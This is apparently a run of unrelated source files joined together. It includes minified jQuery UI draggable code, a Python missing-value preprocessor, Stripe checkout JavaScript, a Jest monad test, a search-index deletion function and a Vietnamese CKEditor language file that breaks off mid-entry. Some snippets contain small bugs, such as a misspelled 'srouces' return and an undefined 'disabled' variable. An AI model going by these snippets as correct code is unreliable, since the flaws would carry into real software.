!(this.scrollParent[0]!=document&&d.ui.contains(this.scrollParent[0],this.offsetParent[0]))?this.offsetParent:this.scrollParent,f=/(html|body)/i.test(c[0].tagName),e=a.pageX,h=a.pageY;if(this.originalPosition){var g;if(this.containment){if(this.relative_container){g=this.relative_container.offset();g=[this.containment[0]+g.left,this.containment[1]+g.top,this.containment[2]+g.left,this.containment[3]+g.top]}else g=this.containment;if(a.pageX-this.offset.click.left<g[0])e=g[0]+this.offset.click.left; if(a.pageY-this.offset.click.top<g[1])h=g[1]+this.offset.click.top;if(a.pageX-this.offset.click.left>g[2])e=g[2]+this.offset.click.left;if(a.pageY-this.offset.click.top>g[3])h=g[3]+this.offset.click.top}if(b.grid){h=b.grid[1]?this.originalPageY+Math.round((h-this.originalPageY)/b.grid[1])*b.grid[1]:this.originalPageY;h=g?!(h-this.offset.click.top<g[1]||h-this.offset.click.top>g[3])?h:!(h-this.offset.click.top<g[1])?h-b.grid[1]:h+b.grid[1]:h;e=b.grid[0]?this.originalPageX+Math.round((e-this.originalPageX)/ b.grid[0])*b.grid[0]:this.originalPageX;e=g?!(e-this.offset.click.left<g[0]||e-this.offset.click.left>g[2])?e:!(e-this.offset.click.left<g[0])?e-b.grid[0]:e+b.grid[0]:e}}return{top:h-this.offset.click.top-this.offset.relative.top-this.offset.parent.top+(d.browser.safari&&d.browser.version<526&&this.cssPosition=="fixed"?0:this.cssPosition=="fixed"?-this.scrollParent.scrollTop():f?0:c.scrollTop()),left:e-this.offset.click.left-this.offset.relative.left-this.offset.parent.left+(d.browser.safari&&d.browser.version< 526&&this.cssPosition=="fixed"?0:this.cssPosition=="fixed"?-this.scrollParent.scrollLeft():f?0:c.scrollLeft())}},_clear:function(){this.helper.removeClass("ui-draggable-dragging");this.helper[0]!=this.element[0]&&!this.cancelHelperRemoval&&this.helper.remove();this.helper=null;this.cancelHelperRemoval=false},_trigger:function(a,b,c){c=c||this._uiHash();d.ui.plugin.call(this,a,[b,c]);if(a=="drag")this.positionAbs=this._convertPositionTo("absolute");return d.Widget.prototype._trigger.call(this,a,b, c)},plugins:{},_uiHash:function(){return{helper:this.helper,position:this.position,originalPosition:this.originalPosition,offset:this.positionAbs}}});d.extend(d.ui.draggable,{version:"1.8.16"});d.ui.plugin.add("draggable","connectToSortable",{start:function(a,b){var c=d(this).data("draggable"),f=c.options,e=d.extend({},b,{item:c.element});c.sortables=[];d(f.connectToSortable).each(function(){var h=d.data(this,"sortable");if(h&&!h.options.disabled){c.sortables.push({instance:h,shouldRevert:h.options.revert}); h.refreshPositions();h._trigger("activate",a,e)}})},stop:function(a,b){var c=d(this).data("draggable"),f=d.extend({},b,{item:c.element});d.each(c.sortables,function(){if(this.instance.isOver){this.instance.isOver=0;c.cancelHelperRemoval=true;this.instance.cancelHelperRemoval=false;if(this.shouldRevert)this.instance.options.revert=true;this.instance._mouseStop(a);this.instance.options.helper=this.instance.options._helper;c.options.helper=="original"&&this.instance.currentItem.css({top:"auto",left:"auto"})}else{this.instance.cancelHelperRemoval= false;this.instance._trigger("deactivate",a,f)}})},drag:function(a,b){var c=d(this).data("draggable"),f=this;d.each(c.sortables,function(){this.instance.positionAbs=c.positionAbs;this.instance.helperProportions=c.helperProportions;this.instance.offset.click=c.offset.click;if(this.instance._intersectsWith(this.instance.containerCache)){if(!this.instance.isOver){this.instance.isOver=1;this.instance.currentItem=d(f).clone().removeAttr("id").appendTo(this.instance.element).data("sortable-item",true); this.instance.options._helper=this.instance.options.helper;this.instance.options.helper=function(){return b.helper[0]};a.target=this.instance.currentItem[0];this.instance._mouseCapture(a,true);this.instance._mouseStart(a,true,true);this.instance.offset.click.top=c.offset.click.top;this.instance.offset.click.left=c.offset.click.left;this.instance.offset.parent.left-=c.offset.parent.left-this.instance.offset.parent.left;this.instance.offset.parent.top-=c.offset.parent.top-this.instance.offset.parent.top; c._trigger("toSortable",a);c.dropped=this.instance.element;c.currentItem=c.element;this.instance.fromOutside=c}this.instance.currentItem&&this.instance._mouseDrag(a)}else if(this.instance.isOver){this.instance.isOver=0;this.instance.cancelHelperRemoval=true;this.instance.options.revert=false;this.instance._trigger("out",a,this.instance._uiHash(this.instance));this.instance._mouseStop(a,true);this.instance.options.helper=this.instance.options._helper;this.instance.currentItem.remove();this.instance.placeholder&& this.instance.placeholder.remove();c._trigger("fromSortable",a);c.dropped=false}})}});d.ui.plugin.add("draggable","cursor",{start:function(){var a=d("body"),b=d(this).data("draggable").options;if(a.css("cursor"))b._cursor=a.css("cursor");a.css("cursor",b.cursor)},stop:function(){var a=d(this).data("draggable").options;a._cursor&&d("body").css("cursor",a._cursor)}});d.ui.plugin.add("draggable","opacity",{start:function(a,b){a=d(b.helper);b=d(this).data("draggable").options;if(a.css("opacity"))b._opacity= a.css("opacity");a.css("opacity",b.opacity)},stop:function(a,b){a=d(this).data("draggable").options;a._opacity&&d(b.helper).css("opacity",a._opacity)}});d.ui.plugin.add("draggable","scroll",{start:function(){var a=d(this).data("draggable");if(a.scrollParent[0]!=document&&a.scrollParent[0].tagName!="HTML")a.overflowOffset=a.scrollParent.offset()},drag:function(a){var b=d(this).data("draggable"),c=b.options,f=false;if(b.scrollParent[0]!=document&&b.scrollParent[0].tagName!="HTML"){if(!c.axis||c.axis!= "x")if(b.overflowOffset.top+b.scrollParent[0].offsetHeight-a.pageY<c.scrollSensitivity)b.scrollParent[0].scrollTop=f=b.scrollParent[0].scrollTop+c.scrollSpeed;else if(a.pageY-b.overflowOffset.top<c.scrollSensitivity)b.scrollParent[0].scrollTop=f=b.scrollParent[0].scrollTop-c.scrollSpeed;if(!c.axis||c.axis!="y")if(b.overflowOffset.left+b.scrollParent[0].offsetWidth-a.pageX<c.scrollSensitivity)b.scrollParent[0].scrollLeft=f=b.scrollParent[0].scrollLeft+c.scrollSpeed;else if(a.pageX-b.overflowOffset.left< c.scrollSensitivity)b.scrollParent[0].scrollLeft=f=b.scrollParent[0].scrollLeft-c.scrollSpeed}else{if(!c.axis||c.axis!="x")if(a.pageY-d(document).scrollTop()<c.scrollSensitivity)f=d(document).scrollTop(d(document).scrollTop()-c.scrollSpeed);else if(d(window).height()-(a.pageY-d(document).scrollTop())<c.scrollSensitivity)f=d(document).scrollTop(d(document).scrollTop()+c.scrollSpeed);if(!c.axis||c.axis!="y")if(a.pageX-d(document).scrollLeft()<c.scrollSensitivity)f=d(document).scrollLeft(d(document).scrollLeft()- c.scrollSpeed);else if(d(window).width()-(a.pageX-d(document).scrollLeft())<c.scrollSensitivity)f=d(document).scrollLeft(d(document).scrollLeft()+c.scrollSpeed)}f!==false&&d.ui.ddmanager&&!c.dropBehaviour&&d.ui.ddmanager.prepareOffsets(b,a)}});d.ui.plugin.add("draggable","snap",{start:function(){var a=d(this).data("draggable"),b=a.options;a.snapElements=[];d(b.snap.constructor!=String?b.snap.items||":data(draggable)":b.snap).each(function(){var c=d(this),f=c.offset();this!=a.element[0]&&a.snapElements.push({item:this, width:c.outerWidth(),height:c.outerHeight(),top:f.top,left:f.left})})},drag:function(a,b){for(var c=d(this).data("draggable"),f=c.options,e=f.snapTolerance,h=b.offset.left,g=h+c.helperProportions.width,n=b.offset.top,o=n+c.helperProportions.height,i=c.snapElements.length-1;i>=0;i--){var j=c.snapElements[i].left,l=j+c.snapElements[i].width,k=c.snapElements[i].top,m=k+c.snapElements[i].height;if(j-e<h&&h<l+e&&k-e<n&&n<m+e||j-e<h&&h<l+e&&k-e<o&&o<m+e||j-e<g&&g<l+e&&k-e<n&&n<m+e||j-e<g&&g<l+e&&k-e<o&& o<m+e){if(f.snapMode!="inner"){var p=Math.abs(k-o)<=e,q=Math.abs(m-n)<=e,r=Math.abs(j-g)<=e,s=Math.abs(l-h)<=e;if(p)b.position.top=c._convertPositionTo("relative",{top:k-c.helperProportions.height,left:0}).top-c.margins.top;if(q)b.position.top=c._convertPositionTo("relative",{top:m,left:0}).top-c.margins.top;if(r)b.position.left=c._convertPositionTo("relative",{top:0,left:j-c.helperProportions.width}).left-c.margins.left;if(s)b.position.left=c._convertPositionTo("relative",{top:0,left:l}).left-c.margins.left}var t= p||q||r||s;if(f.snapMode!="outer"){p=Math.abs(k-n)<=e;q=Math.abs(m-o)<=e;r=Math.abs(j-h)<=e;s=Math.abs(l-g)<=e;if(p)b.position.top=c._convertPositionTo("relative",{top:k,left:0}).top-c.margins.top;if(q)b.position.top=c._convertPositionTo("relative",{top:m-c.helperProportions.height,left:0}).top-c.margins.top;if(r)b.position.left=c._convertPositionTo("relative",{top:0,left:j}).left-c.margins.left;if(s)b.position.left=c._convertPositionTo("relative",{top:0,left:l-c.helperProportions.width}).left-c.margins.left}if(!c.snapElements[i].snapping&& (p||q||r||s||t))c.options.snap.snap&&c.options.snap.snap.call(c.element,a,d.extend(c._uiHash(),{snapItem:c.snapElements[i].item}));c.snapElements[i].snapping=p||q||r||s||t}else{c.snapElements[i].snapping&&c.options.snap.release&&c.options.snap.release.call(c.element,a,d.extend(c._uiHash(),{snapItem:c.snapElements[i].item}));c.snapElements[i].snapping=false}}}});d.ui.plugin.add("draggable","stack",{start:function(){var a=d(this).data("draggable").options;a=d.makeArray(d(a.stack)).sort(function(c,f){return(parseInt(d(c).css("zIndex"), 10)||0)-(parseInt(d(f).css("zIndex"),10)||0)});if(a.length){var b=parseInt(a[0].style.zIndex)||0;d(a).each(function(c){this.style.zIndex=b+c});this[0].style.zIndex=b+a.length}}});d.ui.plugin.add("draggable","zIndex",{start:function(a,b){a=d(b.helper);b=d(this).data("draggable").options;if(a.css("zIndex"))b._zIndex=a.css("zIndex");a.css("zIndex",b.zIndex)},stop:function(a,b){a=d(this).data("draggable").options;a._zIndex&&d(b.helper).css("zIndex",a._zIndex)}})})(jQuery);
""" Copyright (C) 2020 Patrick Schwab, F. Hoffmann-La Roche Ltd Copyright (C) 2019 Patrick Schwab, ETH Zurich Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import numpy as np from covews.apps.util import isfloat from covews.data_access.preprocessing.base_processor import BasePreprocessor class DropMissing(BasePreprocessor): def __init__(self, max_fraction_missing=float("inf")): super(DropMissing, self).__init__() self.max_fraction_missing = max_fraction_missing self.col_state = None self.dropped_feature_names = None def fit(self, x, y=None): if len(x.shape) == 1: x = np.expand_dims(x, axis=-1) num_cols = x.shape[-1] self.col_state = [] for j in range(num_cols): missing = np.array(list(map(lambda xi: 1 if isfloat(xi) and np.isnan(float(xi)) else 0, x[:, j]))) num_missing = np.count_nonzero(missing == 1) fraction_missing = float(num_missing) / len(missing) # Drop features with too many missing values. drop = fraction_missing > self.max_fraction_missing self.col_state.append(drop) def transform(self, x, y=None): if len(x.shape) == 1: x = np.expand_dims(x, axis=-1) num_cols = len(self.col_state) with_feature_names = self.feature_names is not None new_x, new_feature_names, dropped_feature_names = [], [], [] for j in range(num_cols): drop = self.col_state[j] if drop: if with_feature_names: dropped_feature_names.append(self.feature_names[j]) else: if with_feature_names: new_feature_names.append(self.feature_names[j]) new_x.append(x[:, j]) new_x = np.column_stack(new_x) if with_feature_names: self.feature_names = new_feature_names self.dropped_feature_names = dropped_feature_names assert len(self.feature_names) == new_x.shape[-1] return new_x
class Solution(object): def findLUSlength(self, strs): """ :type strs: List[str] :rtype: int """
module.exports = { prefix: 'fas', iconName: 'clipboard', icon: [384, 512, [], "f328", "M384 112v352c0 26.51-21.49 48-48 48H48c-26.51 0-48-21.49-48-48V112c0-26.51 21.49-48 48-48h80c0-35.29 28.71-64 64-64s64 28.71 64 64h80c26.51 0 48 21.49 48 48zM192 40c-13.255 0-24 10.745-24 24s10.745 24 24 24 24-10.745 24-24-10.745-24-24-24m96 114v-20a6 6 0 0 0-6-6H102a6 6 0 0 0-6 6v20a6 6 0 0 0 6 6h180a6 6 0 0 0 6-6z"] };
/** * # Send reports/artifacts from testbot back to client * * By default, serial logs (given that the hardware is set up correctly), and the * logs from the tests will be sent back to the client that started the test, upon * the test finishing. Other artifacts can be sent back to the client using the * `archiver` method. * * The Archiver is imported into each test and hence the methods can be accessed within any test. Check * `test.js` to check the imports. To archive a file: * * @example * ```js * await this.Archiver.add(this.id, "Path/to/file/needs/to/be/archived"); * ``` * * To directly archive the output of a command, example: `journalctl` or `dmesg` commands. Use the * `archiveLogs` helper accessible through `worker` context. * * * @example * ```js * await this.context.get().worker.archiveLogs(title, target, command); * ``` * * Using this method, at the end of the test, any artifacts added to the archive are compressed and * downloaded by the client. These are available in the `workspace/reports` directory at the end of * the test. This can also be helpful when storing artifacts/reports/logs after a test suite run. * * @module Archiver */ /* * Copyright 2019 balena * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ 'use strict'; const config = require('config'); const { createWriteStream } = require('fs'); const { copy, ensureDir } = require('fs-extra'); const { basename, join } = require('path'); module.exports = { /** * Archive a file to be later sent to the client as an artifact. * * @param {string} id The name of the directory in which logs will be archived. Usuallly this value is the name of the * test suite (Available in the test using `this.id`) * @param {string} artifactPath The absolute path of the file needed to be archived. */ add: async (id, artifactPath) => { const baseLocation = join(config.get('leviathan.artifacts'), id) const archivePath = join(baseLocation, basename(artifactPath)); await ensureDir(baseLocation); await copy(artifactPath, archivePath); }, /** * Archive the file as a stream to be later sent to the client as an artifact. * * @param {string} id The name of the directory in which logs will be archived. Usuallly this value is the name of the * test suite (Available in the test using `this.id`) * @param {string} artifactPath The absolute path of the file needed to be archived. * @returns stream of the file */ getStream: async (id, artifactPath) => { const baseLocation = join(config.get('leviathan.artifacts'), id) const archivePath = join(baseLocation, basename(artifactPath)); await ensureDir(baseLocation); return createWriteStream(archivePath); } };
import React from "react"; import CustomerElement from "./customerElement"; class CustomerList extends React.Component { render(){ return( <div > { this.props.customers !== null ? this.props.customers.map((e, i) => <CustomerElement key={i} customer={e}/>) : null } </div> ); } } module.exports = CustomerList;
define([ "dojo/i18n!js/config/nls/local", "esri/layers/FeatureLayer" ], function (i18n, FeatureLayer) { return { // the feature layers needs to be published in 10.3 or higher version of arcgis server sources: [{ featureLayer: new FeatureLayer({ url: "http://services.arcgis.com/P8Cok4qAP1sTVE59/arcgis/rest/services/ALG_ADMLEVEL2/FeatureServer/0", outFields: ["*"] }), searchFields: ["FIRST_NAME"], displayField: "FIRST_NAME", exactMatch: false, outFields: ["*"], name: i18n.algeria, placeholder: i18n.algeria, maxResults: 4, maxSuggestions: 4, suggestionsEnabled: true, minSuggestCharacters: 0 } ], getSources() { return this.srouces; } } });
Stripe.setPublishableKey('pk_test_fQfWbbhOaMjuJQLXdPkIjORH'); var $form = $('#checkout-form'); $form.submit(function (event) { $('#charge-error').addClass('hidden'); $form.find('button').prop('disabled', true); Stripe.card.createToken({ number: $('#card-number').val(), cvc: $('#card-cvc').val(), exp_month: $('#card-expiry-month').val(), exp_year: $('#card-expiry-year').val(), name: $('#card-name').val() }, stripeResponseHandler); }); function stripeResponseHandler(status, response) { if(response.error){ $('#charge-error').removeClass('hidden'); $('#charge-error').text(response.error.message); $form.find('button').prop(disabled, false); }else { var token = response.id; $form.append($('<input type="hidden" name="stripeToken" />').val(token)); // Submit the form: $form.get(0).submit(); } }
import {Either} from '../src/Monad/index'; test("Testing: Either", ()=>{ const fromNullable = Either .fromNullable(100) , map = Either .fromNullable(100) .map(data=>data/2) .getOrElse("No Map") , value = Either .fromNullable(100) .map(data=>data/2) .value , setValue = Either .fromNullable(2) , right = Either .fromNullable(100) .map((data)=>data*4) .map(data=>data/2) .filter(data=>data === 200) .getOrElse("Nothing") , left = Either .fromNullable(100) .map((data)=>data*4) .map(data=>data/2) .filter(data=>data > 200) .getOrElse("Nothing") , undefinedValue = Either .fromNullable(undefined) .map((data)=>data*4) .map(data=>data/2) .filter(data=>data > 200) .getOrElse("Undefined") , nullValue = Either .fromNullable(null) .map((data)=>data*4) .map(data=>data/2) .filter(data=>data > 200) .getOrElse("Null") , chain = Either .fromNullable(5) .chain(function(data){ return new function(){ this.value = data this.getValue = function(){return this.value} return this; } }) , nullChain = Either .fromNullable(null) .chain(function(data){ return new function(){ this.value = data this.getValue = function(){return this.value} return this; } }); try { setValue.value = 20; setValue = setValue.value; } catch(e){ } expect(setValue.value).toBe(2) expect(map).toBe(50) expect(value).toBe(50) expect(fromNullable.getOrElse("Other")).toBe(100) expect(right).toBe(200) expect(left).toBe("Nothing") expect(undefinedValue).toBe("Undefined") expect(nullValue).toBe("Null") expect(chain.getValue()).toBe(5) expect(nullChain.getOrElse("Null Chain")).toBe("Null Chain") })
const axios = require('axios') const generateToken = require('./generate-token') const pkg = require('../package.json') module.exports = async context => { const url = `${process.env.SEARCH_SERVICE_URL}/api/indexes/${process.env.SEARCH_SERVICE_INDEX}` const token = generateToken({ key: process.env.SEARCH_SERVICE_JWT_KEY, payload: { system: pkg.name } }) axios.defaults.headers.common['Authorization'] = token try { const { data } = await axios.delete(url) context.log(`delete-index - ${process.env.SEARCH_SERVICE_INDEX} - success`) return data } catch (error) { context.log.error(`delete-index - ${error}`) throw error } }
/* Copyright (c) 2003-2015, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or http://ckeditor.com/license */ CKEDITOR.lang['vi']={"editor":"Bộ soạn thảo văn bản có định dạng","editorPanel":"Bảng điều khiển Rich Text Editor","common":{"editorHelp":"Nhấn ALT + 0 để được giúp đỡ","browseServer":"Duyệt máy chủ","url":"URL","protocol":"Giao thức","upload":"Tải lên","uploadSubmit":"Tải lên máy chủ","image":"Hình ảnh","flash":"Flash","form":"Biểu mẫu","checkbox":"Nút kiểm","radio":"Nút chọn","textField":"Trường văn bản","textarea":"Vùng văn bản","hiddenField":"Trường ẩn","button":"Nút","select":"Ô chọn","imageButton":"Nút hình ảnh","notSet":"<không thiết lập>","id":"Định danh","name":"Tên","langDir":"Hướng ngôn ngữ","langDirLtr":"Trái sang phải (LTR)","langDirRtl":"Phải sang trái (RTL)","langCode":"Mã ngôn ngữ","longDescr":"Mô tả URL","cssClass":"Lớp Stylesheet","advisoryTitle":"Nhan đề hướng dẫn","cssStyle":"Kiểu ","ok":"Đồng ý","cancel":"Bỏ qua","close":"Đóng","preview":"Xem trước","resize":"Kéo rê để thay đổi kích cỡ","generalTab":"Tab chung","advancedTab":"Tab mở rộng","validateNumberFailed":"Giá trị này không phải là số.","confirmNewPage":"Mọi thay đổi không được lưu lại, nội dung này sẽ bị mất. Bạn có chắc chắn muốn tải một trang mới?","confirmCancel":"Một vài tùy chọn đã bị thay đổi. Bạn có chắc chắn muốn đóng hộp thoại?","options":"Tùy chọn","target":"Đích đến","targetNew":"Cửa sổ mới (_blank)","targetTop":"Cửa sổ trên cùng (_top)","targetSelf":"Tại trang (_self)","targetParent":"Cửa sổ cha (_parent)","langDirLTR":"Trái sang phải (LTR)","langDirRTL":"Phải sang trái (RTL)","styles":"Kiểu","cssClasses":"Lớp CSS","width":"Chiều rộng","height":"Chiều cao","align":"Vị trí","alignLeft":"Trái","alignRight":"Phải","alignCenter":"Giữa","alignJustify":"Sắp chữ","alignTop":"Trên","alignMiddle":"Giữa","alignBottom":"Dưới","alignNone":"Không","invalidValue":"Giá trị không hợp lệ.","invalidHeight":"Chiều cao phải là số nguyên.","invalidWidth":"Chiều rộng phải là số nguyên.","invalidCssLength":"Giá trị quy định cho trường \"%1\" phải là một số dương có hoặc không có một đơn vị đo CSS hợp lệ (px, %, in, cm, mm, em, ex, pt, hoặc pc).","invalidHtmlLength":"Giá trị quy định cho trường \"%1\" phải là một số dương có hoặc không có một đơn vị đo HTML hợp lệ (px hoặc %).","invalidInlineStyle":"Giá trị quy định cho kiểu nội tuyến phải bao gồm một hoặc nhiều dữ liệu với định dạng \"tên:giá trị\", cách nhau bằng dấu chấm phẩy.","cssLengthTooltip":"Nhập một giá trị theo pixel hoặc một số với một đơn vị CSS hợp lệ (px, %, in, cm, mm, em, ex, pt, hoặc pc).","unavailable":"%1<span class=\"cke_accessibility\">, không có</span>"},"about":{"copy":"Bản quyền &copy; $1. Giữ toàn quyền.","dlgTitle":"Thông tin về CKEditor","help":"Kiểm tra $1 để được giúp đỡ.","moreInfo":"Vui lòng ghé thăm trang web của chúng tôi để có thông tin về giấy phép:","title":"Thông tin về CKEditor","userGuide":"Hướng dẫn sử dụng CKEditor"},"basicstyles":{"bold":"Đậm","italic":"Nghiêng","strike":"Gạch xuyên ngang","subscript":"Chỉ số dưới","superscript":"Chỉ số trên","underline":"Gạch chân"},"blockquote":{"toolbar":"Khối trích dẫn"},"clipboard":{"copy":"Sao chép","copyError":"Các thiết lập bảo mật của trình duyệt không cho phép trình biên tập tự động thực thi lệnh sao chép. Hãy sử dụng bàn phím cho lệnh này (Ctrl/Cmd+C).","cut":"Cắt","cutError":"Các thiết lập bảo mật của trình duyệt không cho phép trình biên tập tự động thực thi lệnh cắt. Hãy sử dụng bàn phím cho lệnh này (Ctrl/Cmd+X).","paste":"Dán","pasteArea":"Khu vực dán","pasteMsg":"Hãy dán nội dung vào trong khung bên dưới, sử dụng tổ hợp phím (<STRONG>Ctrl/Cmd+V</STRONG>) và nhấn vào nút <STRONG>Đồng ý</STRONG>.","securityMsg":"Do thiết lập bảo mật của trình duyệt nên trình biên tập không thể truy cập trực tiếp vào nội dung đã sao chép. Bạn cần phải dán lại nội dung vào cửa sổ này.","title":"Dán"},"contextmenu":{"options":"Tùy chọn menu bổ xung"},"button":{"selectedLabel":"%1 (Đã chọn)"},"toolbar":{"toolbarCollapse":"Thu gọn thanh công cụ","toolbarExpand":"Mở rộng thnah công cụ","toolbarGroups":{"document":"Tài liệu","clipboard":"Clipboard/Undo","editing":"Chỉnh sửa","forms":"Bảng biểu","basicstyles":"Kiểu cơ bản","paragraph":"Đoạn","links":"Liên kết","insert":"Chèn","styles":"Kiểu","colors":"Màu sắc","tools":"Công cụ"},"toolbars":"Thanh công cụ"},"elementspath":{"eleLabel":"Nhãn thành phần","eleTitle":"%1 thành phần"},"format":{"label":"Định dạng","panelTitle":"Định dạng","tag_address":"Address","tag_div":"Bình thường (DIV)","tag_h1":"Heading 1","tag_h2":"Heading 2","tag_h3":"Heading 3","tag_h4":"Heading 4","tag_h5":"Heading 5","tag_h6":"Heading 6","tag_p":"Bình thường (P)","tag_pre":"Đã thiết lập"},"horizontalrule":{"toolbar":"Chèn đường phân cách ngang"},"image":{"alertUrl":"Hãy đưa vào đường dẫn của ảnh","alt":"Chú thích ảnh","border":"Đường viền","btnUpload":"Tải lên máy chủ","button2Img":"Bạn có muốn chuyển nút bấm bằng ảnh được chọn thành ảnh?","hSpace":"Khoảng đệm ngang","img2Button":"Bạn có muốn chuyển đổi ảnh được chọn thành nút bấm bằng ảnh?","infoTab":"Thông tin của ảnh","linkTab":"Tab liên kết","lockRatio":"Giữ nguyên tỷ lệ","menu":"Thuộc tính của ảnh","resetSize":"Kích thước gốc","title":"Thuộc tính của ảnh","titleButton":"Thuộc tính nút của ảnh","upload":"Tải lên","urlMissing":"Thiếu đường dẫn hình ảnh","vSpace":"Khoảng đệm dọc","validateBorder":"Chiều rộng của đường viền phải là một số nguyên dương","validateHSpace":"Khoảng đệm ngang phải là một số nguyên dương","validateVSpace":"Khoảng đệm dọc phải là một số nguyên dương"},"indent":{"indent":"Dịch vào trong","outdent":"Dịch ra ngoài"},"fakeobjects":{"anchor":"Điểm neo","flash":"Flash","hiddenfield":"Trường ẩn","iframe":"IFrame","unknown":"Đối tượng không rõ ràng"},"link":{"acccessKey":"Phím hỗ trợ truy cập","advanced":"Mở rộng","advisoryContentType":"Nội dung hướng dẫn","advisoryTitle":"Nhan đề hướng dẫn","anchor":{"toolbar":"Chèn/Sửa điểm neo","menu":"Thuộc tính điểm neo","title":"Thuộc tính điểm neo","name":"Tên của điểm neo","errorName":"Hãy nhập vào tên của điểm neo","remove":"Xóa neo"},"anchorId":"Theo định danh thành phần","anchorName":"Theo tên điểm neo","charset":"Bảng mã của tài nguyên được liên kết đến","cssClasses":"Lớp Stylesheet","emailAddress":"Thư điện tử","emailBody":"Nội dung thông điệp","emailSubject":"Tiêu đề thông điệp","id":"Định danh","info":"Thông tin liên kết","langCode":"Mã ngôn ngữ","langDir":"Hướng ngôn ngữ","langDirLTR":"Trái sang phải (LTR)","langDirRTL":"Phải sang trái (RTL)","menu":"Sửa liên kết","name":"Tên","noAnchors":"(Không có điểm neo nào trong tài liệu)","noEmail":"Hãy đưa vào địa chỉ thư điện tử","noUrl":"Hãy đưa vào đường dẫn liên kết (URL)","other":"<khác>","popupDependent":"Phụ thuộc (Netscape)","popupFeatures":"Đặc điểm của cửa sổ Popup","popupFullScreen":"Toàn màn hình (IE)","popupLeft":"Vị trí bên trái","popupLocationBar":"Thanh vị trí","popupMenuBar":"Thanh Menu","popupResizable":"Có thể thay đổi kích cỡ","popupScrollBars":"Thanh cuộn","popupStatusBar":"Thanh trạng thái","popupToolbar":"Thanh công cụ","popupTop":"Vị trí phía trên","rel":"Quan hệ","selectAnchor":"Chọn một điểm neo","styles":"Kiểu (style)","tabIndex":"Chỉ số của Tab","target":"Đích","targetFrame":"<khung>","targetFrameName":"Tên khung đích","targetPopup":"<cửa sổ popup>","targetPopupName":"Tên cửa sổ Popup","title":"Liên kết","toAnchor":"Neo trong trang này","toEmail":"Thư điện tử","toUrl":"URL","toolbar":"Chèn/Sửa liên kết","type":"Kiểu liên kết","unlink":"Xoá liên kết","upload":"Tải lên"},"list":{"bulletedlist":"Chèn/Xoá Danh sách không thứ tự","numberedlist":"Chèn/Xoá Danh sách có thứ tự"},"magicline":{"title":"Chèn đoạn vào đây"},"maximize":{"maximize":"Phóng to tối đa","minimize":"Thu nhỏ"},"pastetext":{"button":"Dán theo định dạng văn bản thuần","title":"Dán theo định dạng văn bản thuần"},"pastefromword":{"confirmCleanup":"Văn bản bạn muốn dán có kèm định dạng của Word. Bạn có muốn loại bỏ định dạng Word trước khi dán?","error":"Không thể để làm sạch các dữ liệu dán do một lỗi nội bộ","title":"Dán với định dạng Word","toolbar":"Dán với định dạng Word"},"removeformat":{"toolbar":"Xoá định dạng"},"sourcearea":{"toolbar":"Mã HTML"},"specialchar":{"options":"Tùy chọn các ký tự đặc biệt","title":"Hãy chọn ký tự đặc biệt","toolbar":"Chèn ký tự đặc biệt"},"scayt":{"btn_about":"Thông tin về SCAYT","btn_dictionaries":"Từ điển","btn_disable":"Tắt SCAYT","btn_enable":"Bật SCAYT","btn_langs":"Ngôn ngữ","btn_options":"Tùy chọn","text_title":"Kiểm tra chính tả ngay khi gõ chữ (SCAYT)"},"stylescombo":{"label":"Kiểu","panelTitle":"Phong cách định dạng","panelTitle1":"Kiểu khối","panelTitle2":"Kiểu trực tiếp","panelTitle3":"Kiểu đối tượng"},"table":{"border":"Kích thước đường viền","caption":"Đầu đề","cell":{"menu":"Ô","insertBefore":"Chèn ô Phía trước","insertAfter":"Chèn ô Phía sau","deleteCell":"Xoá ô","merge":"Kết hợp ô","mergeRight":"Kết hợp sang phải","mergeDown":"Kết hợp xuống dưới","splitHorizontal":"Phân tách ô theo chiều ngang","splitVertical":"Phân tách ô theo chiều dọc","title":"Thuộc tính của ô","cellType":"Kiểu của ô","rowSpan":"Kết hợp hàng","colSpan":"Kết hợp cột","wordWrap":"Chữ liền hàng","hAlign":"Canh lề ngang","vAlign":"Canh lề dọc","alignBaseline":"Đường cơ sở","bgColor":"Màu nền","borderColor":"Màu viền","data":"Dữ liệu","header":"Đầu đề","yes":"Có","no":"Không","invalidWidth":"Chiều rộng của ô phải là một số nguyên.","invalidHeight":"Chiều cao của ô phải là một số nguyên.","invalidRowSpan":"Số hàng kết hợp phải là một số nguyên.","invalidColSpan":"Số cột kết hợp phải là một số nguyên.","chooseColor":"Chọn màu"},"cellPad":"Khoảng đệm giữ ô và nội dung","cellSpace":"Khoảng cách giữa các ô","column":{"menu":"Cột","insertBefore":"Chèn cột phía trước","insertAfter":"Chèn cột phía sau","deleteColumn":"Xoá cột"},"columns":"Số cột","deleteTable":"Xóa bảng","headers":"Đầu đề","headersBoth":"Cả hai","headersColumn":"Cột đầu tiên","headersNone":"Không có","headersRow":"Hàng đầu tiên","invalidBorder":"Kích cỡ của đường biên phải là một số nguyên.","invalidCellPadding":"Khoảng đệm giữa ô và nội dung phải là một số nguyên.","invalidCellSpacing":"Khoảng cách giữa các ô phải là một số nguyên.","invalidCols":"Số lượng cột phải là một số lớn hơn 0.","invalidHeight":"Chiều cao của bảng phải là một số nguyên.","invalidRows":"Số lượng hàng phải là một số lớn hơn 0.","invalidWidth":"Chiều rộng của bảng phải là một số nguyên.","menu":"Thuộc tính bảng","row":{"menu":"Hàng","insertBefore":"Chèn hàng phía 